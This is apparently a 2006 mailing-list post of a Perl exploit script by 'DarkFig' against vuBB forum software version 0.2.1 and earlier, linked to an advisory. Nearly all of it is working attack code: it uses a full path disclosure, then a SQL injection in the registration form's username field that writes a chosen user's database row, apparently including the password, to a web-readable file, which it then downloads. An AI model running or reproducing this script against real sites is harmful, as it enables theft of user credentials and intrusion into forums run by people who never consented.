vuBB <= 0.2.1 [BFA] SQL Injection Exploit + Advisory link

Mon, 19 Jun 2006 10:48:17 -0700 

#!/usr/bin/perl

#

# by DarkFig -- acid-root.new.fr

# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full 
Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt

#

use IO::Socket;

use LWP::Simple;



# Header

print "\r\n+---------------------------------------+", "\r\n";

print "|  vuBB <= 0.2.1 [BFA] SQL Injection   -|", "\r\n";

print "+---------------------------------------+", "\r\n";



# Usage

if(!$ARGV[2]){

  print "| Usage: <host> <path> <username> ------|", "\r\n";

  print "+---------------------------------------+", "\r\n";

exit;

}



# Host

if($ARGV[0] =~ /http:\/\/(.*)/){

  $host = $1;

} else {

  $host = $ARGV[0];

}

print "[+]Host: $host\r\n";



# Var

my $path = $ARGV[1];

my $user = $ARGV[2]; print "[+]User: $user\r\n";

my $port = 80;

my $fpd  = "http://".$host.$path."includes/vubb.php";;

my $err1 = "[-]Can't connect to the host\r\n";

my $err2 = "[-]Can't retrieve the full path\r\n";

my $err3 = "[-]Can't retrieve the results\r\n";

my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";



# Full Path Disclosure

$req0 = get($fpd) or die print $err1 and end();

if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) {

  $fullpath = $1."/thisismypasswd.txt";

  print "[+]Path: $1\r\n";

} else {

  print $err2 and end();

}



# Malicious data

my $pdat = 
"user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";

my $ldat = length $pdat;

my $req1 = IO::Socket::INET->new(

                                 PeerAddr => $host,

                                 PeerPort => $port,

                                 Proto => "tcp"

                                    ) or print $err1 and end();

print $req1 "$poti", "\r\n";

print $req1 "Host: $host", "\r\n";

print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";

print $req1 "Content-Length: $ldat", "\r\n\n";

print $req1 "$pdat", "\r\n";

close($req1);



# Results

$req2 = get("http://".$host.$path."/thisismypasswd.txt";) or print $err3 and 
end();

open(f, ">VUBB_RESULT.txt");

print f $req2;

close(f);

print "[+]Done: VUBB_RESULT.txt\r\n";

end();



# Bye

sub end {

print "+---------------------------------------+", "\r\n";

exit;

}

Reply via email to